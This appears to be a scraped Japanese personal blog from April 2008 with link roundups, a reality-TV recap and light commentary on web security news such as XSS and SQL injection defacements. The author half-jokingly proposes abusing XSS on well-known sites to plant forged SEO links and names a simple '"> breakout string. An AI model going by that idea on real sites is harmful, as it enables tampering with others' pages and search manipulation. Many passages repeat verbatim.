- 「2ちゃんねる」にDDoS攻撃、攻撃元は韓国国内4,000以上のIPアドレス (IMPRESS)
- “レイア姫”実現間近!? 3Dホログラフィをリアルタイム生成するディスプレイ
- 振って飲む炭酸飲料「ファンタ ふるふるシェイカー」 (GIGAZINE)
- やる夫で学ぶネットワークビジネス (ハムスター速報)
- 1泊2日は2泊3日よりどうして高いのか (ExciteBit)
- 理系のための恋愛論 (279) 人見知りだけど、新人女性にどう接したら
まにあっくだけど性格がゆがんでない可愛い女の子の新人、入ってこないかなぁw[TV][あいのり] #399 パンツの恋スロバキア共和国から、アフリカ大陸のガーナに移動。 スロバキア、放送一回ですか?!w矢印: 宮くん→桃。 聖二→よっこ。 クロ、海。新メンバー: * こーすけ
(22歳) O型、千葉県出身。 男性用パンツショップの店長さん。新メンバーのこーすけに食いつくクロ。 シュテパーンから新しい恋へ。クロ「なんかね、好きな芸能人鈴木紗理奈って言ってて・・・沢尻エリカとか言われるよりはなんか良かった。 すごい良い。 気が合う気がするしなんか楽しいすごい」宮くんと桃は、あいかわらず、ほのぼのな感じ♪ (^-^)桃「心理テストやる?」 宮くん「心理テスト?」桃「今から言う4つのアイテムでうちら(女性メンバー)3人の名前当てはめてね。 ネックレスの人とカバンの人とイヤリングの人とブーツの人」宮くん「桃はネックレスじゃない? よっこはブーツって感じかな。 イヤリングかなクロ」桃「ブーツが苦手な人。 イヤリングが自分のこと好きな人。 で・・・ネックレスが恋人にしたい人」
桃「ふふふふふ」 宮くん「ゴホ ゴホ ゴホ ゴホ ゴホ ゴホ ゴホ」元カノを忘れて(?)よっこへの恋に目覚めた聖二。聖二「付き合いたいね。 もう元カノ元カノじゃないからさ僕は。 結婚して安心を与えてあげたいっていうかさ。 本当に最後の恋愛結婚できるチャンスかもしれないんで」街で聖二とよっこが二人で話しているとき、近くで喧嘩が始まる。よっこ「いや〜 怖い」聖二“めちゃくちゃ嬉しかったっす。 テンションアゲアゲですよほんと。 うわ来ちゃったみたいな。 手繋いじゃったじゃないですか。 お腹いっぱいで。 心がいっぱいで。 嬉しいっす”元カノからプレゼントされた宝物の腕時計をまだつけている聖二だが、、、聖二「告白がOKでよっこと付き合うことができてその時よっこが『もう捨てて』って言うんだったら捨てます」ラバディービーチの砂浜で乗馬をすることになった7人。 馬があばれてこーすけが怪我。聖二「ちょっとこーすけのお見舞い行って来い。 たぶん一番心配してるのお前だと思うからさ。 だから傍にいて手握ってあげて大丈夫だよって言ってあげるだけでも全然違うしさ」クロ「みんなで行かなくていいの?」 聖二「必要ない必要ない。 そこは1人で行ったほうがいい」お見舞いに行った先でこーすけの洗髪や沐浴や洗濯をするクロ。 ついに・・・クロ「あはははははは。 こーすけかわいい。 なんか本当キュンとしちゃって。 でもそのキュンを隠さなきゃと思ってこのパンツでペシンて叩いた。 かわい〜! はははは」クロの日記“あたし好きな人ができたぁ その名もこーすけ!!!”来週は、また、あいのりがお休みらしい。(-_-;⇒* 今週のあいのり
、 * あいのりウラ話(新メンバーの日記)
2008/04/22(火)火曜日ー。(未だに筋肉痛が治らないw)
[セキュリティ] * セカンドオーダ・クロスサイト・スクリプティング (ITPro)
経由。 ふと思いついたのは、iframe埋め込みじゃなくて、SEO の新しい(?!)手法として、有名サイトに XSS を見つけて、「<a href="http://yamagata.int21h.jp/d/">ヤマガタ21のサイト</a>」みたいに自サイトへのリンクを捏造した状態で検索エンジンのクローラに拾わせるようにして、有名サイトからリンクがあるということで自サイトのページランクが向上することを狙うとか・・・どうですかね?w[出来事] * オバマ氏のサイトが改ざん被害、クリントン氏のサイトへ勝手に飛ぶ? (ITmedia)
経由。 「my.barackobama.com」で登録済みユーザがイベント情報を投稿する画面において、適切なエスケープが行われないパラメータが存在していたため、HTMLタグを含む内容を投稿することが可能だったらしい。 これにより、クリントン陣営のサイトにリダイレクトされるような、いたずらの書き込みが行われていた模様。 こんなものを“ハッキング”とか呼ぶのはどうなんだろう。(^-^;関連: * 大統領候補オバマ氏のサイトがハッキングの被害に (CNET)
- まっちゃさん
経由。 ふと思いついたのは、iframe埋め込みじゃなくて、SEO の新しい(?!)手法として、有名サイトに XSS を見つけて、「<a href="http://yamagata.int21h.jp/d/">ヤマガタ21のサイト</a>」みたいに自サイトへのリンクを捏造した状態で検索エンジンのクローラに拾わせるようにして、有名サイトからリンクがあるということで自サイトのページランクが向上することを狙うとか・・・どうですかね?w[出来事] * オバマ氏のサイトが改ざん被害、クリントン氏のサイトへ勝手に飛ぶ? (ITmedia)
- ずきんさん
経由。 「my.barackobama.com」で登録済みユーザがイベント情報を投稿する画面において、適切なエスケープが行われないパラメータが存在していたため、HTMLタグを含む内容を投稿することが可能だったらしい。 これにより、クリントン陣営のサイトにリダイレクトされるような、いたずらの書き込みが行われていた模様。 こんなものを“ハッキング”とか呼ぶのはどうなんだろう。(^-^;関連: * 大統領候補オバマ氏のサイトがハッキングの被害に (CNET)
2008/04/23(水)水曜日ー。(しっとかないと、嫉妬家内と。)
[出来事] * 中国製偽シスコ・ルータが米国の重要インフラに流通している件 (武田先生)
経由。 劣化コピーの偽Ciscoルータが出回っているそうです。 FBI によれば、現状のものにはバックドアの存在などは確認されていないそうですが、要注意ですね。(@_@)関連: * FBI Fears Chinese Hackers Have Back Door Into US Government & Military
[雑談] * セカイ系ウェブツール考(19) 聴衆を眠らせないプレゼンを作るには? (MYCOM)
経由。 amachang の S6 は、葉っぱさんが使ってるのを見て感動した覚えがあるー。[セキュリティ] * 2008年第1四半期の脆弱性届出情報 (葉っぱ日記)
”[雑談] いろいろ。
「郵便受け」と「ポスト」な例え、一瞬、面白いなと思ったけど、盗聴の説明とかイマイチ。
- まっちゃさん
経由。 劣化コピーの偽Ciscoルータが出回っているそうです。 FBI によれば、現状のものにはバックドアの存在などは確認されていないそうですが、要注意ですね。(@_@)関連: * FBI Fears Chinese Hackers Have Back Door Into US Government & Military
[雑談] * セカイ系ウェブツール考(19) 聴衆を眠らせないプレゼンを作るには? (MYCOM)
- ずきんさん
経由。 amachang の S6 は、葉っぱさんが使ってるのを見て感動した覚えがあるー。[セキュリティ] * 2008年第1四半期の脆弱性届出情報 (葉っぱ日記)
textile中の人からの情報によりますと、ウェブアプリケーションの脆弱性の届出244件のうち約40%が特定個人によるものだという噂です。“* 「特定個人」が(太田さんから)別の人に移り、割合も大幅に増加しただけという噂。
”[雑談] いろいろ。
- Office 2007のインターフェイスを使い慣れた旧バージョンのスタイルに変更 (窓の杜)
- テレビショッピングの番組で起こってしまったハプニングムービー (GIGAZINE)
- 代金が払われないため、300万円かけて作った部屋を自分で破壊する建設業者 (GIGAZINE)
- 光市母子殺害事件の「被害者は1.5人」赤子は0.5カウント (痛いニュース)
- あなたの身近なセキュリティ 第13回:メール編(2)「郵便受け」の安全性を考える
「郵便受け」と「ポスト」な例え、一瞬、面白いなと思ったけど、盗聴の説明とかイマイチ。
2008/04/24(木)木曜日ー。(今日飛ばす、京都バス。)
[セキュリティ] * セキュリティ投資すごろく (NTT西日本)
一回目が “部長からドンマイ” レベルで、二回目が “部長から表彰” レベルでしたwWebアプリの対策をあきらめたのが良かったらしい。(←ダメぢゃんw)[雑談] * mixi日記で公開範囲を記事ごとに設定できる機能、全ユーザーに公開 (ITmedia)
「mixiプレミアム」ユーザ以外も日記の公開範囲が設定できるようになったそうです。(^-^)[セキュリティ] * Web改ざんが再び猛威―数時間で10倍、国内サイトも被害に (ITPro)
これはすごいw 日本ではどんなパフォーマンスが見られるのでしょうか?(ちがうw[雑談] いろいろ。
一回目が “部長からドンマイ” レベルで、二回目が “部長から表彰” レベルでしたwWebアプリの対策をあきらめたのが良かったらしい。(←ダメぢゃんw)[雑談] * mixi日記で公開範囲を記事ごとに設定できる機能、全ユーザーに公開 (ITmedia)
「mixiプレミアム」ユーザ以外も日記の公開範囲が設定できるようになったそうです。(^-^)[セキュリティ] * Web改ざんが再び猛威―数時間で10倍、国内サイトも被害に (ITPro)
textile編集部では、今回の攻撃で埋め込まれる文字列を特定し、Googleで検索したところ、およそ2万5000件が表示された(図1)。その中には、日本語のサイトも複数含まれていた。Google で検索されるサイトは、改ざんは成功しているものの HTMLタグとしての挿入には失敗している(エスケープされた状態で表示されている)サイトなのでしょうね。 本当に危ない状態にあるサイトの実態数は、このやり方では把握できないのかも。[雑談] * 【豪州】 聖火リレーの最中、上空に「フリーチベット」の飛行機雲が出現
これはすごいw 日本ではどんなパフォーマンスが見られるのでしょうか?(ちがうw[雑談] いろいろ。
- 新攻撃ツール「トルネード」出現、改ざんサイトを経由して攻撃 (日経BP)
- オリンピックがテーマのトロイの木馬、すでに13件が発見 (CNET)
- Windows版「Safari」ブラウザで複数の脆弱性--研究者が報告 (CNET)
- なぁなぁ、マクド一緒に行けへん? (アルファルファモザイク)
2008/04/25(金)金曜日ー。(“警察のパトカーが追跡したところ、・・・”)
[雑談] * 世界のナベアツがアホになる割合について挑戦してみる (yoggyさん)
これは笑ったw 100億回くらい試したところ、80%あたりに収束しそうな気配とのこと。[雑談] * 今月のWEB+DB PRESSにとんでもないマンガが!!!
WEB+DB PRESS で、「はまちちゃんのセキュリティ講座」の連載が始まるという宣伝。(^-^;[雑談] * プレスリリース: HDE、「メール誤送信」に関する実態調査を実施
約7割のビジネスユーザがメールの誤送信を経験、主な誤送信理由は「うっかりミス」。関連: * 「メール誤送信」に関する実態調査 (株式会社HDE)
**[pdf]**[雑談] * 6000人が作ったシステムは必ず動く (ITPro)
経由。 開発要員6000人、開発工数11万人月、投資額2500億円。 テストだけでも4万人月。 こんな特大規模のプロジェクトをマネジメント出来る人、日本にどれくらい居るんだろう。(@_@)[雑談] いろいろ。
これは笑ったw 100億回くらい試したところ、80%あたりに収束しそうな気配とのこと。[雑談] * 今月のWEB+DB PRESSにとんでもないマンガが!!!
WEB+DB PRESS で、「はまちちゃんのセキュリティ講座」の連載が始まるという宣伝。(^-^;[雑談] * プレスリリース: HDE、「メール誤送信」に関する実態調査を実施
約7割のビジネスユーザがメールの誤送信を経験、主な誤送信理由は「うっかりミス」。関連: * 「メール誤送信」に関する実態調査 (株式会社HDE)
**[pdf]**[雑談] * 6000人が作ったシステムは必ず動く (ITPro)
- まっちゃさん
経由。 開発要員6000人、開発工数11万人月、投資額2500億円。 テストだけでも4万人月。 こんな特大規模のプロジェクトをマネジメント出来る人、日本にどれくらい居るんだろう。(@_@)[雑談] いろいろ。
- ついに500GBのHDDが6000円割れ、1TBモデルは半年前の半額に (GIGAZINE)
- 人類は7万年前に絶滅寸前、全世界でわずか2000人 (GIGAZINE)
- 【小町】「夫が超合金ロボットをニヤニヤと眺めて気持ち悪いので捨てたら、ケンカになりました。どうすれば夫を反省させれるでしょうか?」の質問に批判殺到 (痛いニュース)
- 「子供が万引きで捕まえられてかわいそう。なんで取りやすい場所に置くんだ」と書店に抗議する親も…本の万引き、年間40億円 (痛いニュース)
- ドラッグを服用したりビールを飲んだりした人が木に近づくとどうなるか (GIGAZINE)
- 「休みたいならやめればいい」急成長の日本電産社長 (asahi.com)
2008/04/26(土)土曜日ー。(愛猫、あいねこ、あいびょう。)
[雑談] * Eee PCでATMからカード情報を盗む3人組、監視カメラの録画で御用 (Gizmodo)
さのさん経由。 これはすごいw 夜間に、銀行に忍び込んで ATM を破壊して、中身を黒のEee PC に置き換えた偽物を設営する手口だそうです。 この “ハックしたATM” を操作したら、最終的にはどうなるんだろう? ちゃんとお金まで出るのかな?w ・・・誰にも気づかれずに銀行に忍び込んで、ATM をぶっ壊すことが出来るくらいなら、直接お金を盗れば良いのに。(ぇw[雑談] * 俺が勝手に彼女だと思い込んでる女とのメールを晒すスレ (ハムスター速報)
実は普通に仲が良いんじゃないかと思えてきたw 律儀に返事が来るところが素晴らしいw
さのさん経由。 これはすごいw 夜間に、銀行に忍び込んで ATM を破壊して、中身を黒のEee PC に置き換えた偽物を設営する手口だそうです。 この “ハックしたATM” を操作したら、最終的にはどうなるんだろう? ちゃんとお金まで出るのかな?w ・・・誰にも気づかれずに銀行に忍び込んで、ATM をぶっ壊すことが出来るくらいなら、直接お金を盗れば良いのに。(ぇw[雑談] * 俺が勝手に彼女だと思い込んでる女とのメールを晒すスレ (ハムスター速報)
実は普通に仲が良いんじゃないかと思えてきたw 律儀に返事が来るところが素晴らしいw
2008/04/27(日)日曜日ー。(「DREAMS COME TRUE」<=>「DREAM COMES TRUE」)
[占い] * 自己紹介工場
トップページに、「* 大住が警察に逮捕された件について(編集部より)
」というお知らせが出てたw[雑談] いろいろ。
←自慢できるのは無口?w
←「金返せ」とか効果的かもw
←新幹線通学してる人見たことありますw
←1997年って最近過ぎw
textileキッチンのことをチッキンと間違えるヤマガタです。よろしく。いやいや、キッチンのことは、キチンとキッチンと言えますです。(ぇw[雑談] * 【長野聖火】全身黒タイツに銀のお面男、連行される。「探偵ファイル」スタッフか
トップページに、「* 大住が警察に逮捕された件について(編集部より)
」というお知らせが出てたw[雑談] いろいろ。
- 理系のための恋愛論 (280) オトコの自慢に女子は寛大?
←自慢できるのは無口?w
- デイリーポータルZ: 勧誘を撃退できる10の方法
←「金返せ」とか効果的かもw
- デイリーポータルZ: 新幹線の閑散駅めぐり
←新幹線通学してる人見たことありますw
- カフェのストローって、どうして緑色? (ExciteBit)
←1997年って最近過ぎw
2008/04/28(月)月曜日ー。(「あなたの小鳥怪死体」<=>「あなたのこと理解したい」)
[雑談] * 世界のナベアツがアホになる割合について挑戦してみる〜続き (yoggyさん)
前回の80%あたりで収束するという説は正しくなく、実は、限りなく100%に近づくのが正解かも?とのこと。 『* 「3の倍数でアホ」 ギネス記録に (虚構新聞)
』(ずっとアホになり続けてたせいで、399999 の次からもアホのまま戻れなかったw)という嘘ニュースのネタを思い出しましたよw[セキュリティ] * 「SQLインジェクション攻撃とIISは無関係」とMicrosoft (ITmedia)
確かに、今回大規模に起きている SQLインジェクションは、(xp_cmdshell などを使った改ざんではなく、) 普通にシステムテーブルから文字列型のカラムを持つテーブルを探し出して地道に改ざんするタイプだったと思うので、MS-SQLサーバに限った話ではありませんし、ましてや IIS のせいでもありませんね。 ふつうに Webアプリで SQLインジェクション対策が行われているか否かの問題であり、アプリケーションサーバやデータベースサーバの種類には本質的には依存していません。[雑談] * Xbox360を死亡させる耐久実験ディスクが流出中 (GIGAZINE)
もしも、こんなディスクがイベント会場とかでさりげなく配られていたりしたら・・・怖すぎ。(>_<)[セキュリティ] * 止まらないWebページ改ざん,JavaScriptに気をつけろ (ITPro)
←なぜ「江戸城」?w
前回の80%あたりで収束するという説は正しくなく、実は、限りなく100%に近づくのが正解かも?とのこと。 『* 「3の倍数でアホ」 ギネス記録に (虚構新聞)
』(ずっとアホになり続けてたせいで、399999 の次からもアホのまま戻れなかったw)という嘘ニュースのネタを思い出しましたよw[セキュリティ] * 「SQLインジェクション攻撃とIISは無関係」とMicrosoft (ITmedia)
確かに、今回大規模に起きている SQLインジェクションは、(xp_cmdshell などを使った改ざんではなく、) 普通にシステムテーブルから文字列型のカラムを持つテーブルを探し出して地道に改ざんするタイプだったと思うので、MS-SQLサーバに限った話ではありませんし、ましてや IIS のせいでもありませんね。 ふつうに Webアプリで SQLインジェクション対策が行われているか否かの問題であり、アプリケーションサーバやデータベースサーバの種類には本質的には依存していません。[雑談] * Xbox360を死亡させる耐久実験ディスクが流出中 (GIGAZINE)
もしも、こんなディスクがイベント会場とかでさりげなく配られていたりしたら・・・怖すぎ。(>_<)[セキュリティ] * 止まらないWebページ改ざん,JavaScriptに気をつけろ (ITPro)
textile攻撃者はこの方法で,Webコンテンツにiframeタグを埋め込んだ。…恐ろしいのは,埋め込まれるiframeタグに不正なJavaScriptが記述されていることだ。iframeタグにJavaScriptが記述されるわけではありません。(とかw[雑談] いろいろ。
- 生産終えるはずの「ELECTRIBE」、ニコ動で人気復活 「売れちゃってしょうがない」 (ITmedia)
- あれ?俺いつのまに眼鏡っ娘好きになったんだ…? (無題のドキュメント)
- 三洋と松下「資本提携、検討している事実はない」 (ITmedia)
- 27カップ麺 : カレーヌードル+牛乳! (カップ麺deエンジニア)
- 韓国「Auction」ハッキング事件の余波 - 大統領府サイトの被害も判明 (MYCOM)
- 韓国でも止まらない個人情報流出 - 大手通信会社が顧客情報を無断で… (MYCOM)
- 高層ビル「だるま落とし」で解体 鹿島が新工法を実用化 (asahi.com)
- ススキノの有名風俗店火災で男女3人死亡 (日刊スポーツ)
←なぜ「江戸城」?w
- スポンサー離れテレビ局の大不況。フジは制作費5%カット。視聴率の合格ラインは12%。高校以上はすでにテレビを見捨てている (痛いニュース)
- 地下の昆虫が“緑の電話線”で地上の昆虫に語りかける (なんでも評点)
2008/04/29(火)火曜日ー。(『流砂』 by 高嶋哲夫)
[セキュリティ] * Hacker Safe? Not So Much II (HS_ISSA)
mi1kmanさん経由。 サウンドハ○スの件で、あらためてダメダメさ加減が露わになったハッカーセーフ。 この「検査合格シール」が付いているサイトで、いとも簡単に XSS をしてみせる証拠ビデオですw 特に難しいパターンでも無く、普通に '"> で閉じているような XSS が検査漏れしてるらしい。(-_-;[雑談] * 桂小春団治流、初対面の人と打ちとける3つの糸口 (Exciteニュース)
さのさん経由。 和装かつヴィトンの草履がおすすめって・・・オートクチュールっすか?w[雑談] * 【アキバ露出女】 沢本あすか(30)、「22歳」証明する“明治大学の卒業証書”をブログで公開するも矛盾発覚で“墓穴” (痛いニュース)
卒業証書を偽造して公開してしまうのは、さすがにマズイんじゃあ?(^-^;関連: * 警視庁万世橋署「30歳で間違いない」…“自称22歳”アキバ露出女の年齢について
[雑談] * 結婚相談所にいくらつぎ込んだ?
100万つぎ込んでも、結局、無料の出会い系のほうが良質な場合もあるとのこと。
mi1kmanさん経由。 サウンドハ○スの件で、あらためてダメダメさ加減が露わになったハッカーセーフ。 この「検査合格シール」が付いているサイトで、いとも簡単に XSS をしてみせる証拠ビデオですw 特に難しいパターンでも無く、普通に '"> で閉じているような XSS が検査漏れしてるらしい。(-_-;[雑談] * 桂小春団治流、初対面の人と打ちとける3つの糸口 (Exciteニュース)
さのさん経由。 和装かつヴィトンの草履がおすすめって・・・オートクチュールっすか?w[雑談] * 【アキバ露出女】 沢本あすか(30)、「22歳」証明する“明治大学の卒業証書”をブログで公開するも矛盾発覚で“墓穴” (痛いニュース)
卒業証書を偽造して公開してしまうのは、さすがにマズイんじゃあ?(^-^;関連: * 警視庁万世橋署「30歳で間違いない」…“自称22歳”アキバ露出女の年齢について
[雑談] * 結婚相談所にいくらつぎ込んだ?
100万つぎ込んでも、結局、無料の出会い系のほうが良質な場合もあるとのこと。
2008/04/30(水)水曜日ー。(思わず開いたspam:「ルパン三世より」)
[雑談] * 新しい合コンの形、“リョウコン”って何? (Business Media)
さのさん経由。 男女が料理教室で行う合コン、“リョウコン”の話w どんなペアになるのかお互いにクジ運が必要そうw ...女の子と二人で45分も話している自分が想像できない。orz[雑談] * 大きなマウスHARIKO しろーさん&くろーさん (actbrise)
経由。 両手で操作する、巨大なネコ顔型のマウス(?!)。 バカげているw[雑談] FXデイトレードの失敗談
昨日の夜、逆指値も設定せずに、難平しながらドルの買い増しをしていたら、いつの間にか 75万ドルほど持ってて、そこでストンと1円落ちたときは・・・もう終わったかと思いました。(汗[雑談] * リキャップ可能、ペットボトルのお酒が新鮮! (ExciteBit)
コンビニなんかで置いたら、子供がジュースと間違えて買っちゃいそうかも?!w[占い] * あなたの好みをズバリ診断! 憧れ女性ちぇっく
さのさん経由。 男女が料理教室で行う合コン、“リョウコン”の話w どんなペアになるのかお互いにクジ運が必要そうw ...女の子と二人で45分も話している自分が想像できない。orz[雑談] * 大きなマウスHARIKO しろーさん&くろーさん (actbrise)
- スラド
経由。 両手で操作する、巨大なネコ顔型のマウス(?!)。 バカげているw[雑談] FXデイトレードの失敗談
- FXデイトレードで失敗談 (kamiyaさん)
- 【FX失敗談】無計画なスキャルピングで大怪我☆イタタタ!! (ねこざんさん)
- 【FX失敗談】損きりポイントをずらして大怪我☆損きり入れてる意味ないなりよ!
- 雇用統計☆昨夜の9時30分ごろ心臓止まるかと思ったなりよ!! (ねこざんさん)
- 【FX失敗談】無計画なドテンは大怪我のもとなりよ☆イタタタタタ (ねこざんさん)
- 【FX失敗談】ゴールデンクロスしそうだ☆後で確認したらクロスしていないなりよ!
- トイレの中で 酒は飲んでも、呑まれるな (外為投資FX倶楽部)
昨日の夜、逆指値も設定せずに、難平しながらドルの買い増しをしていたら、いつの間にか 75万ドルほど持ってて、そこでストンと1円落ちたときは・・・もう終わったかと思いました。(汗[雑談] * リキャップ可能、ペットボトルのお酒が新鮮! (ExciteBit)
コンビニなんかで置いたら、子供がジュースと間違えて買っちゃいそうかも?!w[占い] * あなたの好みをズバリ診断! 憧れ女性ちぇっく
textile知的属性評価ですが、割と知的な女性が好みなようです。学校の先生に憧れたり、上司の女性に憧れる傾向があります。そして、しゃべって歌って、うるさいくらいな女性が好みなようです。女性の胸に関しては、そこそこあれば問題ないようです。しかしながらペタンコは嫌なようです。外見的な部分で言うと、大柄な女性は好きではないようです。特に小さいのが良いわけではありませんが、小さい方が可愛いと思っている傾向があります。MOJOさん経由。 女教師に憧れてるんじゃなくて、ただスーツコスが好きなだけですw[雑談] いろいろ。
- フィッシングメールに釣られないで--グーグルが公式ブログで警告 (CNET)
- Xerox、「1日経ったら文字が消える紙」など新技術を発表 (ITmedia)
- チョコレートと交換でパスワードを教えてくれるのは男性より女性の方が多い (GIGAZINE)
- メードらのコスプレ激減…アキバの路上パトロール開始 (asahi.com)
- 鳥居みゆき、結婚していた! ファンの前で電撃発表
- 「休みたいなら辞めろ」発言は暴論?正論? ネットで波紋広がる
- 主審が「死ね」…ラフプレー抗議の選手に逆ギレ (スポーツ報知)